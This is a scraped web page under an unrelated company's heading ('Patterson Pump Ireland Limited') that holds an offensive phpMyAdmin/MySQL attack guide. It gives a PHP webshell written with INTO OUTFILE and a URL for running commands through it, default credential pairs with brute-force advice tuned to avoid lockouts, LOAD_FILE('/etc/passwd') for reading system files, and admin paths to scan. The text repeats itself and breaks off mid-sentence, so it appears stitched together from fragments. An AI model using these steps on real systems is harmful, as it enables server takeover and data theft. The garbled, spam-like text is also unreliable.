`

Welcome to Patterson Pump Ireland Limited

If the database user has FILE privilege and secure_file_priv is empty, write a webshell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";

Verification: Check secure_file_priv:

SHOW VARIABLES LIKE "secure_file_priv";

HackTricks Verified: On older MySQL, you can use INTO DUMPFILE for binary shells (e.g., reverse shell ELF).

Despite decades of warnings, default credentials remain the top entry method.

| Credential Pair | Success Rate (Audited) | |----------------|------------------------| | root: (blank) | ~12% of default XAMPP/LAMP | | root:root | ~8% | | root:123456 | ~5% | | pma:pmapassword | Older configs | | admin:admin | Custom setups |

Verification: Use Hydra or Medusa with a small user/pass list. Limit to 5 attempts/sec to avoid lockouts.

After getting shell or RCE:

LOAD_FILE("/etc/passwd")

Works if secure_file_priv is not set to a restrictive directory.

If the database user has FILE privilege, you can write a webshell.

Verification steps:

SHOW VARIABLES LIKE 'secure_file_priv';

Write a PHP shell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Then access: http://target/shell.php?cmd=id

Verified: Works on Apache with default www-data permissions. Fails if secure_file_priv is set or web directory not writable.

Scanning for these paths yields results in >70% of default installations:

/phpmyadmin/
/pma/
/dbadmin/
/myadmin/
/phpMyAdmin/
/MySQL/
/phpmyadmin2/
/phpmyadmin3/
/pma_db/

Verification tip: Use curl -k -I https://target/phpmyadmin/ and look for the Set-Cookie: phpMyAdmin= header. That header is unique to phpMyAdmin.

Before exploiting, you must find the interface. phpMyAdmin paths are predictable.

Phpmyadmin Hacktricks Verified -

Phpmyadmin Hacktricks Verified -

If the database user has FILE privilege and secure_file_priv is empty, write a webshell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";

Verification: Check secure_file_priv:

SHOW VARIABLES LIKE "secure_file_priv";

HackTricks Verified: On older MySQL, you can use INTO DUMPFILE for binary shells (e.g., reverse shell ELF).

Despite decades of warnings, default credentials remain the top entry method.

| Credential Pair | Success Rate (Audited) | |----------------|------------------------| | root: (blank) | ~12% of default XAMPP/LAMP | | root:root | ~8% | | root:123456 | ~5% | | pma:pmapassword | Older configs | | admin:admin | Custom setups | phpmyadmin hacktricks verified

Verification: Use Hydra or Medusa with a small user/pass list. Limit to 5 attempts/sec to avoid lockouts.

After getting shell or RCE:

LOAD_FILE("/etc/passwd")

Works if secure_file_priv is not set to a restrictive directory.

If the database user has FILE privilege, you can write a webshell. If the database user has FILE privilege and

Verification steps:

SHOW VARIABLES LIKE 'secure_file_priv';

Write a PHP shell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Then access: http://target/shell.php?cmd=id

Verified: Works on Apache with default www-data permissions. Fails if secure_file_priv is set or web directory not writable. HackTricks Verified: On older MySQL, you can use

Scanning for these paths yields results in >70% of default installations:

/phpmyadmin/
/pma/
/dbadmin/
/myadmin/
/phpMyAdmin/
/MySQL/
/phpmyadmin2/
/phpmyadmin3/
/pma_db/

Verification tip: Use curl -k -I https://target/phpmyadmin/ and look for the Set-Cookie: phpMyAdmin= header. That header is unique to phpMyAdmin.

Before exploiting, you must find the interface. phpMyAdmin paths are predictable.